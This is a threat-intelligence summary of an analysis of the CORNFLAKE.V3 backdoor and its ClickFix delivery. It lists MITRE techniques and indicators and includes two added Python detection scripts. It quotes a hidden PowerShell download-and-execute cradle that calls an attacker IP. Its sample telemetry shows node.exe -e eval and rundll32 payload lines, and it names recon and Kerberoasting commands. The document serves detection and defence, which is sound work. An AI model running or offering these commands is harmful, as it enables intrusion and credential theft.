A Cereal Offender: Analyzing the CORNFLAKE.V3 Backdoor | Google Cloud Blog

Mandiant observed UNC5518 using compromised websites and ClickFix fake CAPTCHA lures to trick users into executing PowerShell droppers that install CORNFLAKE.V3, which UNC5774 uses as a backdoor to retrieve and execute additional payloads. The CORNFLAKE.V3 family (Node.js and PHP variants) supports multiple payload types, persistence via Run registry keys, Active Directory reconnaissance, and credential harvesting (Kerberoasting). #UNC5518 #UNC5774 #CORNFLAKE.V3

Keypoints

  • UNC5518 compromises legitimate websites and deploys fake CAPTCHA (ClickFix) pages that copy malicious PowerShell/JS to the clipboard, leading to user execution via Windows+R.
  • UNC5774 leverages access provided by UNC5518 to deploy the CORNFLAKE.V3 backdoor (Node.js and PHP variants) that communicates with C2 over HTTP and supports EXE, DLL, JS, CMD and other payload types.
  • CORNFLAKE.V3 implements persistence through a value under HKCU\Software\Microsoft\Windows\CurrentVersion\Run (named ChromeUpdater, or a randomized name), and can abuse Cloudflare Tunnels to proxy its C2 traffic.
  • The infection chain uses droppers that download Node.js or PHP runtimes, base64-decode an embedded CORNFLAKE.V3 payload, and execute it via node.exe -e or php.exe with covert arguments.
  • Observed post-compromise activity includes host and Active Directory reconnaissance, Kerberoasting credential harvesting, and deployment of secondary implants such as WINDYTWIST.SEA.
  • The PHP variant changes file extensions (e.g., .png/.jpg) for DLL/JS payloads, adds ACTIVE/AUTORUN commands, and uses dynamically generated C2 paths to evade detection.
  • Mandiant and Google SecOps provide hunting queries and detection rules to identify PowerShell launching node.exe/php.exe from %AppData%, suspicious clipboard interactions, and related network connections.
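The hunting idea in the last keypoint (PowerShell launching node.exe/php.exe from %AppData%, the hidden Run-dialog download cradle, and the runtime's outbound connections), written out as an added example; this is not code from the Mandiant write-up or from Google SecOps. It applies behavioural rules to constructed Sysmon-style Event ID 1 (process create) and Event ID 3 (network connect) records. The field names, the user "alice", the node.exe -e body, and the TEST-NET address 203.0.113.10 are assumptions, not observed indicators.

```python
"""Hunt for the CORNFLAKE.V3 execution chain in endpoint telemetry.

Added example, not code from the Mandiant/Google Cloud write-up. The records in
SAMPLE_EVENTS are constructed to resemble Sysmon Event ID 1 and Event ID 3 fields;
host, user and the 203.0.113.10 address are assumptions rather than real IOCs.
"""
import ntpath
import re

PS_NAMES = {"powershell.exe", "pwsh.exe"}
RUNTIME_NAMES = {"node.exe", "php.exe"}

APPDATA_RE = re.compile(r"\\AppData\\Roaming\\", re.IGNORECASE)               # %AppData%
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.IGNORECASE)   # -w h / -WindowStyle Hidden
CRADLE_RE = re.compile(  # download cradle piped straight into Invoke-Expression
    r"\b(?:irm|iwr|Invoke-RestMethod|Invoke-WebRequest)\b[^|]*\|\s*(?:iex|Invoke-Expression)\b",
    re.IGNORECASE)
NODE_INLINE_RE = re.compile(r"\s-e\s")                                        # node.exe -e "<script>"
IMAGE_EXT_DLL_RE = re.compile(r"\S+\.(?:png|jpe?g)\b", re.IGNORECASE)         # DLL renamed to .png/.jpg


def _name(path):
    return ntpath.basename(path).lower()


def classify(ev):
    """Return the hunting rules a single event matches (empty list = nothing to see)."""
    hits = []
    image = _name(ev["Image"])
    if ev["EventID"] == 1:
        parent = _name(ev["ParentImage"])
        cmd = ev["CommandLine"]
        # ClickFix: Run dialog (explorer.exe parent) -> hidden PowerShell download cradle
        if parent == "explorer.exe" and image in PS_NAMES and HIDDEN_RE.search(cmd) and CRADLE_RE.search(cmd):
            hits.append("clickfix_run_dialog_cradle")
        # Dropper: PowerShell launches a user-writable Node.js/PHP runtime from %AppData%
        if parent in PS_NAMES and image in RUNTIME_NAMES and APPDATA_RE.search(ev["Image"]):
            hits.append("powershell_spawns_appdata_runtime")
        # node.exe -e runs the decoded script inline instead of from a .js file on disk
        if image == "node.exe" and NODE_INLINE_RE.search(cmd):
            hits.append("node_inline_script")
        # PHP variant / WINDYTWIST.SEA: rundll32 loading a "picture" that is really a DLL
        if image == "rundll32.exe" and IMAGE_EXT_DLL_RE.search(cmd):
            hits.append("rundll32_image_extension_dll")
    elif ev["EventID"] == 3:
        # A runtime living in %AppData% initiating an outbound connection (C2 beacon)
        if image in RUNTIME_NAMES and APPDATA_RE.search(ev["Image"]) and ev.get("Initiated", True):
            hits.append("appdata_runtime_outbound")
    return hits


def hunt(events):
    """Return [(event_index, rule), ...] for every event/rule pair that fires."""
    return [(i, rule) for i, ev in enumerate(events) for rule in classify(ev)]


# Constructed sample telemetry (not real logs): one infection chain plus benign noise.
USER_RT = r"C:\Users\alice\AppData\Roaming\node-v22.11.0-win-x64\node.exe"
SAMPLE_EVENTS = [
    {"EventID": 1, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -w h -c "$u=[int64]1;irm 203.0.113.10:8080/$u|iex"'},
    {"EventID": 1, "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "Image": USER_RT,
     "CommandLine": '"' + USER_RT + '" -e "eval(Buffer.from(p,\'base64\').toString())"'},
    {"EventID": 3, "Image": USER_RT, "DestinationIp": "203.0.113.10",
     "DestinationPort": 80, "Initiated": True},
    {"EventID": 1, "ParentImage": USER_RT, "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe C:\Users\alice\AppData\Roaming\Shift19434078G0ZrQi.png,#1"},
    # benign: a developer build from Program Files, an admin running a script file
    {"EventID": 1, "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Program Files\nodejs\node.exe", "CommandLine": "node.exe build.js"},
    {"EventID": 1, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell -File C:\Scripts\inventory.ps1"},
]

if __name__ == "__main__":
    for idx, rule in hunt(SAMPLE_EVENTS):
        print(f"event[{idx}] {rule}")
```

The rules are deliberately behavioural: none of them keys on the 138.199.161[.]141 or 159.69.3[.]151 addresses, so a rotated C2 still trips the chain. The `Initiated` field is a real Sysmon Event ID 3 attribute; `ev.get("Initiated", True)` keeps the rule usable on telemetry sources that do not record direction.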

MITRE Techniques

  • [T1059 ] Command and Scripting Interpreter (T1059.001 PowerShell, T1059.007 JavaScript) – CORNFLAKE.V3 and its droppers use PowerShell and the Node.js/PHP runtimes to execute commands and scripts: 'powershell -w h -c "$u=[int64]…;irm 138.199.161[.]141:8080/$u|iex"', followed by node.exe/php.exe execution of the decoded payload.
  • [T1204.004 ] User Execution: Malicious Copy and Paste – the ClickFix fake CAPTCHA seeds the clipboard when the user clicks the image and instructs them to paste into the Run dialog, which executes the script: 'the script is copied to the clipboard by the malicious web page when the user clicked on the image' and 'the user was lured into pasting a hidden script into the Windows Run dialog box which was automatically copied to the clipboard'.
  • [T1547.001 ] Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder – CORNFLAKE.V3 persists by creating a Run value (ChromeUpdater or a randomized name) that launches node.exe/php.exe at logon: 'creates a new registry Run key named ChromeUpdater under HKCU\Software\Microsoft\Windows\CurrentVersion\Run'.
  • [T1105 ] Ingress Tool Transfer – Droppers download the Node.js or PHP runtime and additional payloads from remote servers (nodejs[.]org, windows.php[.]net, 138.199.161[.]141): 'download Node.js via HTTPS from the URL hxxps://nodejs[.]org/dist/… and extract…'.
  • [T1016 ] System Network Configuration Discovery – CORNFLAKE.V3 collects ARP and network-related information with commands such as 'arp -a' as part of its system information collection: 'systeminfo ; … ; arp -a'.
  • [T1082 ] System Information Discovery – The backdoor gathers systeminfo, tasklist/services, drives and privilege level and reports them to the C2: 'gathers the script's version, user privilege level … systeminfo ; tasklist /svc ; Get-Service'.
  • [T1558.003 ] Steal or Forge Kerberos Tickets: Kerberoasting – Actors request service tickets for SPN-bearing accounts and crack the ticket hashes offline: 'attempts to harvest credentials via Kerberoasting… requests a Kerberos service ticket from which a password hash is extracted'.
  • [T1018 ] Remote System Discovery / [T1482 ] Domain Trust Discovery – Recon commands enumerate domain controllers and trusts with nltest and list SPNs with setspn, which is the target list for the Kerberoasting above: 'nltest /dclist … setspn -T -Q */*'.
  • [T1071.001 ] Application Layer Protocol: Web Protocols – CORNFLAKE.V3 communicates with its C2 over HTTP POST/GET and can route that traffic through Cloudflare Tunnels (trycloudflare[.]com) to hide the real server: 'sends an initial POST request to the path /init1234… has also been observed abusing Cloudflare Tunnels to proxy traffic'.
  • [T1218.011 ] System Binary Proxy Execution: Rundll32 – Downloaded DLL payloads such as WINDYTWIST.SEA are launched through rundll32.exe: 'the received payload is written … and launched using rundll32.exe'.

Indicators of Compromise

  • [IP Address ] UNC5518 distribution and C2 – 138.199.161[.]141 (dropper host), 159.69.3[.]151 (CORNFLAKE.V3 Node.js C2)
  • [Domain ] PHP/ClickFix infrastructure – varying-rentals-calgary-predict.trycloudflare[.]com (PHP C2), dnsmicrosoftds-data[.]com and windows-msg-as[.]live (UNC5518 delivery domains)
  • [File Hash ] CORNFLAKE and related samples – 905373a0…6c236 (downloaded.zip SHA256 containing Node.js), 000b24076cae8dbb…071ac5b (node log CORNFLAKE.V3 sample), a2d4e8c3094c959e…a2d1 (php config.cfg CORNFLAKE.V3), and 14f9fbbf7e82…268b0c (WINDYTWIST.SEA DLL)
  • [File Path / Name ] Persistence and dropped files – %APPDATA%\node-v22.11.0-win-x64\node.exe executed with -e, HKCU\Software\Microsoft\Windows\CurrentVersion\Run\ChromeUpdater, %APPDATA%\php\config.cfg (PHP variant), C:\Users\<user>\AppData\Roaming\Shift19434078G0ZrQi.png (WINDYTWIST.SEA)
  • [Registry ] Persistence values – HKCU\Software\Microsoft\Windows\CurrentVersion\Run\ChromeUpdater (Node.js variant), and randomized value names under the same Run key whose command line points at php.exe in %APPDATA% (PHP variant)
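Checking the persistence location above on a suspect host, as an added example (not the blog's or Mandiant's code): the script parses the text produced by `reg export HKCU\Software\Microsoft\Windows\CurrentVersion\Run run.reg` and flags Run values that launch node.exe or php.exe from %APPDATA%, pass an inline script with node.exe -e, carry the ChromeUpdater name, or use a randomized name. The export text below is constructed; the user name, the benign OneDrive entry, the random value name and the exact php.exe command line are assumptions.

```python
"""Triage HKCU Run-key persistence for CORNFLAKE.V3-style autoruns.

Added example, not code from the write-up. Input is the text of a .reg file as
written by `reg export HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run`;
the SAMPLE_EXPORT below is constructed, and its user name, benign entry and
php.exe command line are assumptions.
"""
import ntpath
import re

RUN_KEY = r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run"
RUNTIMES = {"node.exe", "php.exe"}
LURE_NAMES = {"chromeupdater"}           # Run value name reported for the Node.js variant
APPDATA_RE = re.compile(r"\\AppData\\Roaming\\", re.IGNORECASE)            # %APPDATA%
RANDOM_NAME_RE = re.compile(r"^(?=.*[A-Za-z])(?=.*\d)[A-Za-z0-9]{6,}$")  # e.g. "Xk4p9Qz2"

# "name"="value" lines; .reg escapes backslash and double quote with a backslash
_VALUE_LINE = re.compile(r'^"((?:[^"\\]|\\.)*)"="((?:[^"\\]|\\.)*)"$')


def _unescape(s):
    return re.sub(r'\\(["\\])', r'\1', s)


def parse_reg_export(text):
    """Return {value_name: command_line} for the Run key (REG_SZ values only)."""
    values, in_run_key = {}, False
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("["):                       # key header, e.g. [HKEY_CURRENT_USER\...]
            in_run_key = line.strip("[]").lower() == RUN_KEY.lower()
            continue
        m = _VALUE_LINE.match(line)
        if in_run_key and m:
            values[_unescape(m.group(1))] = _unescape(m.group(2))
    return values


def executable_of(cmd):
    """First token of a command line, honouring a double-quoted path."""
    cmd = cmd.strip()
    if cmd.startswith('"'):
        end = cmd.find('"', 1)
        return cmd[1:end] if end > 0 else cmd[1:]
    return cmd.split(None, 1)[0] if cmd else ""


def triage(values):
    """Return {value_name: [reasons]} for Run entries that deserve a closer look."""
    findings = {}
    for name, cmd in values.items():
        exe = executable_of(cmd)
        exe_name = ntpath.basename(exe).lower()
        reasons = []
        if exe_name in RUNTIMES and APPDATA_RE.search(exe):
            reasons.append("scripting runtime launched from %AppData%")
        if exe_name == "node.exe" and re.search(r"\s-e\s", cmd):
            reasons.append("node.exe -e inline script (no .js file on disk)")
        if name.lower() in LURE_NAMES:
            reasons.append("value name mimics a browser updater")
        if RANDOM_NAME_RE.match(name):
            reasons.append("randomized value name")
        if reasons:
            findings[name] = reasons
    return findings


# Constructed .reg export (not from a real host). OneDrive is the benign control entry.
SAMPLE_EXPORT = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"OneDrive"="\"C:\\Users\\alice\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe\" /background"
"ChromeUpdater"="\"C:\\Users\\alice\\AppData\\Roaming\\node-v22.11.0-win-x64\\node.exe\" -e \"eval(s)\""
"Xk4p9Qz2"="\"C:\\Users\\alice\\AppData\\Roaming\\php\\php.exe\" C:\\Users\\alice\\AppData\\Roaming\\php\\config.cfg"
'''

if __name__ == "__main__":
    for name, reasons in triage(parse_reg_export(SAMPLE_EXPORT)).items():
        print(name, "->", "; ".join(reasons))
```

Real `reg export` output is UTF-16LE with a BOM, so read the file with `encoding="utf-16"` before passing it to `parse_reg_export`. REG_EXPAND_SZ values are exported as `hex(2):` byte lists and are skipped by the line regex; if the value you care about is one of those, query it with `reg query` instead.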


Read more: https://cloud.google.com/blog/topics/threat-intelligence/analyzing-cornflake-v3-backdoor